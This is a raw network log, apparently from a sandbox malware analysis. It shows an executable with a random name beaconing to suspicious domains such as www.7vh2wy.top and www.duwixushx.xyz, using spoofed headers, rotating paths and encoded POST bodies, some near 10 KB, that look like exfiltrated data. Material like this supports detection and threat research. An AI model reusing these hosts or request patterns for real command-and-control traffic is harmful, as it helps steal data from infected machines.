                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mdB9%2FHMPu2jvQpp4Ko2FVk%2B3wGJaq0RaGC6QZWTT0v4mrzR%2BITXBDVQZNvA0f6qd23mLiqqNbVonFMEM30IsQ4045EZpI%2BhJY%2FWhcdawJaxiauOVj1vpUASfTvIWWPvDyZ8Of7Elq2vmhsJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96d288b5c461-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</titl
                                                                  Dec 4, 2024 12:52:14.720679045 CET  1236               IN
                                                                  Data Ascii: e> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x5
                                                                  Dec 4, 2024 12:52:14.720691919 CET  752                IN
                                                                  Data Ascii: <h1><strong>Ops,</strong><br>No encontramos<br>essa pgina!</h1> <p>Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link v


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  37          192.168.2.4  50041        20.2.249.7      80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:22.645529985 CET  745                OUT        POST /n7xy/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Origin: http://www.7vh2wy.top
                                                                  Referer: http://www.7vh2wy.top/n7xy/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=wm6hxzKaeG18XThml7sXwPKZJ4h8IGsG+Y3jgi2Ovb+8NglK3+Q41DUbsXC6D4mOPtk3DKCb80FAch6jjrtG++LCCSXzfgFaY0R4aGvwYs4slCi3htaQK0espv5ONV6eb8G74mZ5+oCZPn250M5qBw/xWsnrs8wxhpve/XEhi2gjhxdrPOZZcpGjq/WGF7vrEA==
                                                                  Dec 4, 2024 12:52:24.186882019 CET  289                IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  38          192.168.2.4  50042        20.2.249.7      80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:25.332273960 CET  765                OUT        POST /n7xy/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Origin: http://www.7vh2wy.top
                                                                  Referer: http://www.7vh2wy.top/n7xy/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=wm6hxzKaeG18VyxmmY0Xn/KWXoh8HmsC+YrjgjzDupq8NFBKt9I4yDUbn3C/eomFPt5CDP6b80RAcgKj/M5Z/uLANyX9BQFaY0R4aCPWYvIskyS3gMaXUkevgP5Oal6ab8He4nFf+r6ZPjm53d5pIw+0bMmgnI9ckqbU+BQ+rVghg3Qxe/4OOpiQ34fyI4SifKH03VCDtDyJPOG9THsFTYg=
                                                                  Dec 4, 2024 12:52:26.816433907 CET  289                IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:26 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  39          192.168.2.4  50043        20.2.249.7      80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:28.004697084 CET  10847              OUT        POST /n7xy/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Origin: http://www.7vh2wy.top
                                                                  Referer: http://www.7vh2wy.top/n7xy/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX= [TRUNCATED]
                                                                  Dec 4, 2024 12:52:29.556543112 CET  289                IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:29 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  40          192.168.2.4  50044        20.2.249.7      80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:30.669382095 CET  481                OUT        GET /n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:52:32.225622892 CET  289                IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:31 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  41          192.168.2.4  50045        156.251.17.224  80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:37.927136898 CET  754                OUT        POST /q0vk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Origin: http://www.duwixushx.xyz
                                                                  Referer: http://www.duwixushx.xyz/q0vk/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=eosVKuLBekREJXGS/C+RAksCN84fp5m4GHVS8WWvL4xH7MPNXFCMduEZG9f2kpRN7n2Xcnb8K1fJVi5xHsPp5TrwEjYhMSyPIHlNBySRGdKpQDk9vFWylvu0QyGLoqlyqdqEBhTg4PRAm05d6MpZrjm1oiEPvDv3DJmxYCPNpYG7IpzSC7kuKShk6BGGXsFzbA==
                                                                  Dec 4, 2024 12:52:39.414115906 CET  289                IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:39 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  42          192.168.2.4  50046        156.251.17.224  80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:40.599422932 CET  774                OUT        POST /q0vk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Origin: http://www.duwixushx.xyz
                                                                  Referer: http://www.duwixushx.xyz/q0vk/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=eosVKuLBekREPEOS9hGRBEsBI84fiZm8GHpS8XSFLKVH7s/NWECMeuEZOdf/55R87n61cmn8Kx3JVndxEdPq6jrudzYjDyyPIHlNByG7GcipQT09uhC9rPu3GCGL/6k1qdqyBgPO4NZAm1pd9Y1a8Tm/siFHpB6Qa5PcHTipuLmUAP+ITKF5YSFXnGPyav46ABAKGV3v/Opq/4oqvJFfqLU=
                                                                  Dec 4, 2024 12:52:42.082777977 CET  289                IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:41 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  43          192.168.2.4  50047        156.251.17.224  80                4348  C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                  Dec 4, 2024 12:52:43.266453028 CET  10856              OUT        POST /q0vk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Origin: http://www.duwixushx.xyz
                                                                  Referer: http://www.duwixushx.xyz/q0vk/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 50 45 4f 53 39 68 47 52 42 45 73 42 49 38 34 66 69 5a 6d 38 47 48 70 53 38 58 53 46 4c 4b 64 48 37 66 48 4e 58 6e 71 4d 66 75 45 5a 4e 64 66 79 35 35 52 62 37 6e 79 78 63 6d 72 4b 4b 33 7a 4a 50 46 56 78 46 76 33 71 68 54 72 75 41 6a 59 67 4d 53 79 57 49 48 31 4a 42 79 57 37 47 63 69 70 51 56 51 39 6f 31 57 39 70 50 75 30 51 79 47 48 6f 71 6b 52 71 64 79 69 42 67 4c 77 37 38 35 41 6e 55 5a 64 2f 72 64 61 2b 7a 6d 35 70 69 46 32 70 42 6d 50 61 35 54 2b 48 54 6e 4d 75 4d 57 55 45 61 58 6c 52 2b 42 68 4a 43 73 4f 79 45 66 53 55 2b 6f 2f 4c 41 59 53 43 46 62 30 73 74 64 63 6c 62 31 45 6f 72 52 4f 78 50 55 78 69 4f 6e 49 59 65 62 61 4a 6a 74 36 49 57 39 72 4d 78 31 52 49 7a 42 42 2f 58 5a 6a 64 69 4a 5a 6e 59 59 47 58 48 55 75 62 47 64 74 4d 6b 42 4a 4b 41 61 6a 53 6a 74 53 57 45 79 45 78 73 65 2f 53 46 55 33 51 76 47 30 4b 54 78 4c 66 32 6b 4f 46 73 4c 7a 31 51 61 44 5a 53 43 65 5a 37 50 66 79 53 53 47 62 43 6d 6a 59 51 77 5a 54 6c 71 76 79 46 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]
                                                                  Dec 4, 2024 12:52:44.751914024 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 50048 | Destination IP: 156.251.17.224 | Destination Port: 80 | PID: 4348 | Process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:45.918762922 CET | 484 | OUT | GET /q0vk/?BTPDLZX=TqE1JZ2PW3JWY2uYnAavAXklIsUks6+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU6XPzOQdjNl3sAk02DQStC+27G1hNmCW/pJs=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:52:47.426070929 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 50049 | Destination IP: 47.254.140.255 | Destination Port: 80 | PID: 4348 | Process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:52.994168997 CET | 745 | OUT | POST /x20l/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Origin: http://www.yvcp3.info
                                                                  Referer: http://www.yvcp3.info/x20l/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 53 73 6e 51 47 53 6f 79 46 54 72 74 6f 31 4f 46 32 50 42 53 76 46 46 4b 59 4f 78 63 4f 47 65 68 54 69 33 61 41 64 2b 48 2f 64 6f 6a 46 44 44 41 55 2f 34 33 73 66 6c 74 64 54 4a 45 52 43 34 36 52 62 46 54 47 7a 75 51 4f 61 37 56 72 65 6a 47 43 43 46 45 61 70 2b 5a 79 67 55 44 5a 33 7a 74 46 7a 43 78 42 63 51 45 6c 38 55 33 61 6f 63 43 54 74 36 41 68 78 65 6b 57 31 36 59 6e 65 34 53 46 61 32 61 63 6d 46 71 30 30 44 5a 41 43 38 2b 6d 75 77 6e 6f 33 6e 6e 46 49 45 49 37 4b 61 4b 5a 32 67 74 36 50 43 6a 49 72 6c 49 73 78 42 4f 6f 63 4e 4d 65 56 65 4e 52 7a 64 44 78 51 7a 72 42 41 3d 3d
                                                                  Data Ascii: BTPDLZX=SsnQGSoyFTrto1OF2PBSvFFKYOxcOGehTi3aAd+H/dojFDDAU/43sfltdTJERC46RbFTGzuQOa7VrejGCCFEap+ZygUDZ3ztFzCxBcQEl8U3aocCTt6AhxekW16Yne4SFa2acmFq00DZAC8+muwno3nnFIEI7KaKZ2gt6PCjIrlIsxBOocNMeVeNRzdDxQzrBA==
                                                                  Dec 4, 2024 12:52:54.298651934 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:52:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BAC4755C4F48762BADCE24E5D9C1C81F61902EB285093D63595120E9400
                                                                  Set-Cookie: _csrf=a6909aa77123718158ffc941b86d9911ae85cba8a08572b458601632067aed1da%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22m0wmc7l3Y6T7AIl_gX1UolXmwUXrCn1-%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 48 72 39 71 39 49 4f 65 77 37 79 44 44 31 74 51 59 31 64 59 58 42 2d 43 34 34 71 77 78 35 67 4f 77 42 35 75 4d 64 64 6a 6d 57 78 53 6f 72 47 73 54 6b 58 50 61 73 36 61 56 6f 41 78 44 45 2d 46 79 59 36 32 30 57 76 52 67 31 4d 56 53 48 4b 68 44 4f 5f 53 41 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="3Hr9q9IOew7yDD1tQY1dYXB-C44qwx5gOwB5uMddjmWxSorGsTkXPas6aVoAxDE-FyY620WvRg1MVSHKhDO_SA=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:52:54.298670053 CET | 18 | IN | Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 50050 | Destination IP: 47.254.140.255 | Destination Port: 80 | PID: 4348 | Process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:55.658442974 CET | 765 | OUT | POST /x20l/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Origin: http://www.yvcp3.info
                                                                  Referer: http://www.yvcp3.info/x20l/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 53 73 6e 51 47 53 6f 79 46 54 72 74 70 56 2b 46 7a 6f 56 53 75 6c 46 46 46 2b 78 63 62 57 65 74 54 69 4c 61 41 65 7a 41 2f 50 4d 6a 46 6a 54 41 58 2b 34 33 74 66 6c 74 58 7a 4a 42 62 69 34 31 52 62 35 68 47 79 53 51 4f 61 76 56 72 66 54 47 46 78 64 48 5a 5a 2b 58 70 51 55 37 45 48 7a 74 46 7a 43 78 42 64 30 36 6c 38 4d 33 61 62 45 43 54 4d 36 44 73 52 65 6e 58 31 36 59 6a 65 34 4a 46 61 33 67 63 6e 59 50 30 32 72 5a 41 48 34 2b 6d 2f 77 6b 69 33 6e 6c 61 34 46 50 77 4b 58 44 41 6e 70 45 6e 75 43 66 42 70 4a 6b 70 33 4d 55 35 74 73 62 4d 56 36 2b 4d 30 55 33 38 54 4f 69 61 4b 70 47 59 63 70 71 35 69 74 62 4e 53 46 6e 43 38 66 76 66 58 73 3d
                                                                  Data Ascii: BTPDLZX=SsnQGSoyFTrtpV+FzoVSulFFF+xcbWetTiLaAezA/PMjFjTAX+43tfltXzJBbi41Rb5hGySQOavVrfTGFxdHZZ+XpQU7EHztFzCxBd06l8M3abECTM6DsRenX16Yje4JFa3gcnYP02rZAH4+m/wki3nla4FPwKXDAnpEnuCfBpJkp3MU5tsbMV6+M0U38TOiaKpGYcpq5itbNSFnC8fvfXs=
                                                                  Dec 4, 2024 12:52:56.964818001 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:52:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2B813397DBE986CB5C4E05A354C47B1970B7C9810716FF073327AEFAFE00
                                                                  Set-Cookie: _csrf=9a1ee4f1992cf8075a77323b7965d5c04f5c4b8799b42e6e1adef73ea944e340a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Psy_7H864pI67CSEPaGBo4Y79fBc4iWj%22%3B%7D; path=/; HttpOnly
